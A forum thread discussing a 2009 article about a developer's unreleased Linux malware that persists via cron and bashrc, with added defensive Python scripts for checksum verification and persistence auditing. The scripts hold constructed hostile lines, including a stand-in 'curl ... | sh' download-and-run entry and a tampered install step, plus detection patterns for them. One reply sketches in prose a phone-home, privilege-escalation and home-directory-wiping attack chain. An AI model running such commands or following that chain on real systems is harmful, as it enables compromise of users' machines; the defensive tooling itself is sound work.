Developer Ponders Release of Linux Malware

  • 01-12-2009 04:03PM
    #1
    Closed Accounts Posts: 664 ✭✭✭


    The lack of malware on Linux may be about to change after a developer admitted he has developed a 'package of malware for Unix/Linux'
    A developer who claims he is tired of the “Linux is secure” argument has set out to develop a “package of malware for Unix/Linux” in order to help ethical hackers demonstrate the vulnerability of the open source operating system.
    "I was fed up with the general consensus that Linux is oh-so-secure and has no malware,” a developer going by the name of buchner.johannes wrote on Ask Slashdot, in a posting filed by kdawson.
    “After a week of work, I finished a package of malware for Unix/Linux," Johannes wrote. "Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects.”
    Johannes said the malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads.
    “I tested it to be injected by a PHP script (even circumventing safe mode), so that the web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files,” he said.
    Johannes claimed the object of the exercise was to provide a payload so security people can 'pwn' systems to show security holes, without doing harm (such as deleting files or disrupting normal operation).
    However he admitted to doubts over how ethical it would be to release the toolkit.
    He has concerns that a genuine hacker would rip out the BOINC payload and put “in something really evil, could be turned into proper Linux malware.”
    “On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary,” he said.
    “Technically, it is a nice piece, but should I release it? I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?” he asked.
    There was a mix of opinions to Johannes's debate over releasing the malware. One user by the name of Jeff321 said that he believed Johannes has already decided.
    “There were two options,” Jeff321 wrote. “1. Release it anonymously and take no credit. 2. Write about it and get some credit (but then you can't actually release it due to legal issues).”
    “You can't (and won't) release it now,” he added. “If somebody gets attacked with your code, guess who they're going to prosecute and/or sue.”
    Another user, by the name of sopssa, also waded in. “The summary says it doesn't actually do anything malicious and it isn't a worm. There is no legal reason why he couldn't release the code and/or a paper about it,” said sopssa.
    “The thing is, it's stupid for people to keep thinking their systems are insanely secure,” he wrote. “Linux users fall for this all the time, because they've heard so from lots of other Linux users. It's better to show people that it is actually possible, and maybe it leads to better secured systems too.”


    http://www.eweekeurope.co.uk/news/developer-ponders-release-of-linux-malware-2627
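    The article quotes two things worth pairing: a proxy that rewrites shell scripts and makefiles inside tarballs in transit, and the countermeasure of "verifying the source of downloads (checksums through trusted channels)". The script below is an added illustration of that countermeasure, not code from the article or from the developer it describes. It builds a small constructed release in memory, records the digest a maintainer would publish, then shows that the same archive with one line appended to its install script fails verification, while a digest served alongside the tampered file by the same proxy would not help at all. Package names, file contents and the appended path are made up for the example.

```python
import hashlib
import hmac
import io
import tarfile


def build_tarball(files: dict) -> bytes:
    """Build a .tar.gz in memory from {path: bytes}. Used only to construct sample input."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in sorted(files.items()):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_download(data: bytes, trusted_digest: str) -> bool:
    """True only if the bytes we fetched hash to a digest obtained through a channel the
    party sitting in the download path does not control (signed release notes, the
    distribution's package metadata, the maintainer's page over TLS, ...)."""
    return hmac.compare_digest(sha256_hex(data), trusted_digest.strip().lower())


def changed_members(original: bytes, received: bytes) -> list:
    """Names of archive members whose content differs, to show where a mismatch came from."""
    def contents(blob: bytes) -> dict:
        out = {}
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
            for m in tar.getmembers():
                if m.isfile():
                    out[m.name] = tar.extractfile(m).read()
        return out
    a, b = contents(original), contents(received)
    return sorted(n for n in set(a) | set(b) if a.get(n) != b.get(n))


# Constructed sample release: what the maintainer actually published.
RELEASE_FILES = {
    "pkg-1.0/Makefile": b"all:\n\tcc -o pkg main.c\n",
    "pkg-1.0/install.sh": b"#!/bin/sh\nmake && cp pkg /usr/local/bin/pkg\n",
    "pkg-1.0/main.c": b"int main(void) { return 0; }\n",
}
RELEASE_TARBALL = build_tarball(RELEASE_FILES)
PUBLISHED_DIGEST = sha256_hex(RELEASE_TARBALL)   # what the trusted channel carries

# The same archive after a hostile proxy appended one line to install.sh in transit.
# The line is a stand-in for whatever such a proxy would inject; the path is made up.
TAMPERED_FILES = dict(RELEASE_FILES)
TAMPERED_FILES["pkg-1.0/install.sh"] += b"sh /tmp/.payload.sh &\n"
TAMPERED_TARBALL = build_tarball(TAMPERED_FILES)

if __name__ == "__main__":
    print("clean download verifies:   ", verify_download(RELEASE_TARBALL, PUBLISHED_DIGEST))
    print("tampered download verifies:", verify_download(TAMPERED_TARBALL, PUBLISHED_DIGEST))
    print("members that changed:      ", changed_members(RELEASE_TARBALL, TAMPERED_TARBALL))
    # A .sha256 file fetched from the same mirror through the same proxy proves nothing:
    # the proxy rewrites it to match, and verification "passes".
    print("same-mirror digest passes: ", verify_download(TAMPERED_TARBALL, sha256_hex(TAMPERED_TARBALL)))
```

The only part that does any work is where the digest comes from: a checksum file sitting next to the tarball on the same mirror is reachable by the same proxy, so it has to come from somewhere the downloader trusts independently, or be covered by a signature whose key was obtained that way.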


Comments

  • Registered Users, Registered Users 2 Posts: 14,076 ✭✭✭✭Johnboy1951


    Johannes said the malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads.

    That says it all.

    It cannot be generally spread like a virus.
    It must be executed by the user.

    I do not see it as a security problem ....... it is a user problem.

    No change from what has been known all along ...... if you want to do something stupid then expect results!


  • Closed Accounts Posts: 4,564 ✭✭✭Naikon


    ^

    Agree 100%

    Anyone can root even a Solaris or FreeBSD box if it's not secured properly. The user is generally the cause of most security exploits.

    sysctl kern.securelevel=3 :D


  • Closed Accounts Posts: 12,807 ✭✭✭✭Orion


    You cannot protect against idiots. Sure - it'd be easy to give root a password and login as it for normal use but only an idiot would do it.


  • Closed Accounts Posts: 13,874 ✭✭✭✭PogMoThoin


    This would work better

    [image: the_irish_virus.jpg]


  • Registered Users, Registered Users 2 Posts: 304 ✭✭PhantomBeaker


    Johnboy1951 wrote: »
    That says it all.

    It cannot be generally spread like a virus.
    It must be executed by the user.

    I do not see it as a security problem ....... it is a user problem.

    No change from what has been known all along ...... if you want to do something stupid then expect results!

    I have to say, I agree with the "malware" author's intent though. Most of the security comes from the fact that *nix users aren't targeted that much. That's pretty much it.

    Now, I'll say straight out that I use webmail exclusively when I'm not in work, but in work I use a mail client. In all places I also use a web browser. Being almost exclusively *nix based, I have a relatively limited number of viable choices, and most are based off a codebase from Mozilla. That constitutes my window to the internet at large, more or less. So, if firefox or thunderbird aren't secure, there's a window in.

    One exploit, one unpatched browser or mail client is what's needed to get something in the door. If it's a really gaping hole, it involves allowing execution of some arbitrary file. So that's the way in. (Although, admittedly, those bugs are rare enough)

    After that, you'll probably want root. But even without it, you can do an awful amount of damage to a user (delete their homedir - sure, your box is still working, but you've made their day really, really bad), and still start daemons using a non-privileged port.

    Now, if you do want root, it isn't very hard to find various local-user privilege escalation exploits. Don't know which one to include in your payload? Simple, just let your initial payload be something that phones home (or a known peer) and get a list of exploits that would apply to some information you could get from uname (think of a wandering metasploit). Pull that exploit, and use it.

    You now have root, and can do what you want.

    Being honest, it doesn't sound a million miles away from the tactics used by a number of windows security problems. You have a known software base, you just need to look for exploits and users who don't update as often as they should. The lucky thing is, we don't have critical mass - we don't have enough machines out there to make it worth it, because this would rely on a number of exploits being available on the same machine at the same time, which is an impediment (but not a complete cure) to it spreading, but isn't impossible if you have a greater number of lax users out there.

    Sure, it's a "user problem" (most of it happens in userland, so it MUST be a user problem) but it can still wreck someone's day, especially if it nukes their homedirs except for a crontab that will do it all over again tomorrow (and just imagine if that homedir is on the network), and there is certainly the capability to make something like that do its best to hurt as many machines out there as possible.

    *Important*: Please note this is purely me thinking out loud. I'm posting purely because I don't like the "We *nix users are invulnerable because we use *nix" attitude - there are always ways to make these things work, it just so happens that it's not always worth the effort. It certainly wasn't worth the effort when userbases were smaller, but now you have a VERY popular unix-based system (MacOSX) and one with growing support (Ubuntu - I keep hearing about how people have set that up for their parents/grandparents/dog on an old machine and that they're really very happy with it). After a while, it's going to be more attractive for people to start trying this sort of thing for *nix systems, and all you need is one hole in your browser or mail client...

    This paranoid rant has been brought to you by,
    Aoife
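    Both the original post ("the malware can persist itself in cron, bashrc and other files") and the reply above (a crontab that does it all over again tomorrow) come down to the same question for whoever is cleaning up: what in this account's crontab and shell rc files will run again without anyone asking? The script below is an added example of that audit, written for this page; it is not code from the thread or from the toolkit the article describes. It parses user crontab lines and rc-file lines, and flags entries that run out of a world-writable directory, execute a dotfile, or pipe a download straight into a shell. The rules are assumed heuristics chosen to match what the thread describes, not a signature, and the sample crontab and .bashrc are constructed, with made-up paths and names.

```python
import os
import re
import shlex
from typing import List, Optional, Tuple

# Assumed heuristics for the persistence the thread describes: a payload that re-launches
# itself from cron or a shell rc file, typically from a world-writable directory or behind
# a dotfile name. Illustrative rules, not a signature.
WRITABLE_DIR = re.compile(r"(?:^|[\s\"'=:])(?:/tmp|/var/tmp|/dev/shm)/")
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash|dash|zsh|python\d?)\b")
CRON_SPECIAL = re.compile(r"^@(?:reboot|hourly|daily|weekly|monthly|yearly|annually)\b")
CRON_FIELDS = 5

Finding = Tuple[int, str, List[str]]


def tokens(cmd: str) -> List[str]:
    """Split like the shell would; fall back to whitespace on unbalanced quotes."""
    try:
        return shlex.split(cmd)
    except ValueError:
        return cmd.split()


def cron_command(line: str) -> Optional[str]:
    """Command part of a user crontab line; None for blank, comment and VAR=value lines."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None
    if CRON_SPECIAL.match(s):
        parts = s.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = s.split(None, CRON_FIELDS)
    return parts[CRON_FIELDS] if len(parts) > CRON_FIELDS else None


def classify(cmd: str) -> List[str]:
    """Reasons a command looks like dropped-payload persistence (empty list if none)."""
    reasons = []
    if WRITABLE_DIR.search(cmd):
        reasons.append("runs from a world-writable directory")
    if any("/" in t and os.path.basename(t).startswith(".") for t in tokens(cmd)):
        reasons.append("executes a dotfile")
    if PIPE_TO_SHELL.search(cmd):
        reasons.append("pipes a download straight into a shell")
    return reasons


def audit_crontab(lines: List[str]) -> List[Finding]:
    """(line number, command, reasons) for every crontab entry that trips a rule."""
    findings = []
    for n, line in enumerate(lines, 1):
        cmd = cron_command(line)
        if cmd is not None:
            reasons = classify(cmd)
            if reasons:
                findings.append((n, cmd, reasons))
    return findings


def audit_rc(lines: List[str]) -> List[Finding]:
    """Same for ~/.bashrc and friends: every non-comment line runs at each login."""
    findings = []
    for n, line in enumerate(lines, 1):
        s = line.strip()
        if s and not s.startswith("#"):
            reasons = classify(s)
            if reasons:
                findings.append((n, s, reasons))
    return findings


# Constructed sample input: a user crontab and .bashrc, each with legitimate entries
# and two planted ones. Paths and names are made up for the example.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=user
0 2 * * * /usr/bin/rsync -a /home/user/docs /mnt/backup
*/5 * * * * /home/user/.config/.upd >/dev/null 2>&1
@reboot /dev/shm/.x
""".splitlines()

SAMPLE_BASHRC = """\
# ~/.bashrc
export PATH="$HOME/bin:$PATH"
alias ll='ls -l'
[ -x "$HOME/.local/.s" ] && "$HOME/.local/.s" &
curl -s http://updates.example.invalid/p | sh
""".splitlines()

if __name__ == "__main__":
    for name, findings in (("crontab", audit_crontab(SAMPLE_CRONTAB)),
                           (".bashrc", audit_rc(SAMPLE_BASHRC))):
        for n, cmd, reasons in findings:
            print(f"{name}:{n}: {cmd!r}: {', '.join(reasons)}")
```

On a real box the inputs would be `crontab -l -u <user>`, the files under /var/spool/cron and /etc/cron.d, and the user's .bashrc, .profile and .bash_login. Note what the audit does not cover: cron and rc files are only the obvious autostart points, and something with root can hide in /etc/ld.so.preload, systemd units or init scripts just as easily.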


  • Closed Accounts Posts: 921 ✭✭✭mehmeh12


    But what if you back up your home folder data to an external non networked drive and encrypt data in the home folder?


  • Registered Users, Registered Users 2 Posts: 1,606 ✭✭✭djmarkus


    Girls use Linux? I bet you have a pink theme!


  • Registered Users, Registered Users 2 Posts: 1,105 ✭✭✭larryone


    djmarkus wrote: »
    Girls use Linux? I bet you have a pink theme!

    She's not that kind of girl =0)

    Even the unix OS that is perceived as being the most secure, and even claims to be "secure by default" has had to admit to being compromised... www.openbsd.org
    Dan Bernstein offered a $1k prize for anyone who could find a security hole in djbdns. It was collected.

    No assumptions should ever be made when it comes to these things. The only system that can never be compromised is the one that never gets used.


  • Registered Users, Registered Users 2 Posts: 37,485 ✭✭✭✭Khannie


    "We *nix users are invulnerable because we use *nix"

    This is the thing. Your average linux user is much more tech savvy than your average windows user, so writing malware that requires them to run a shell script or whatever is a giant waste of time and effort. Sure, the landscape may change, but given the statistics in a recent thread, linux has a depressingly LOOOONNNGGGG way to go.


  • Registered Users, Registered Users 2 Posts: 1,105 ✭✭✭larryone


    Khannie wrote: »
    This is the thing. Your average linux user is much more tech savvy than your average windows user

    True, but if every tech savvy user sets up a machine for their less than tech savvy relatives....
    I know I would have had my mother's work machine on linux long ago if it wasn't for applications that don't taste good with wine.
    Would I have every confidence that she'd be as careful wrt security as I am??

    On average, yea linux users are more aware of how to use machines without falling into pitfalls like "life is so much easier when I use the same password everywhere". But you will find a lot of unix based machines out there that can be compromised.

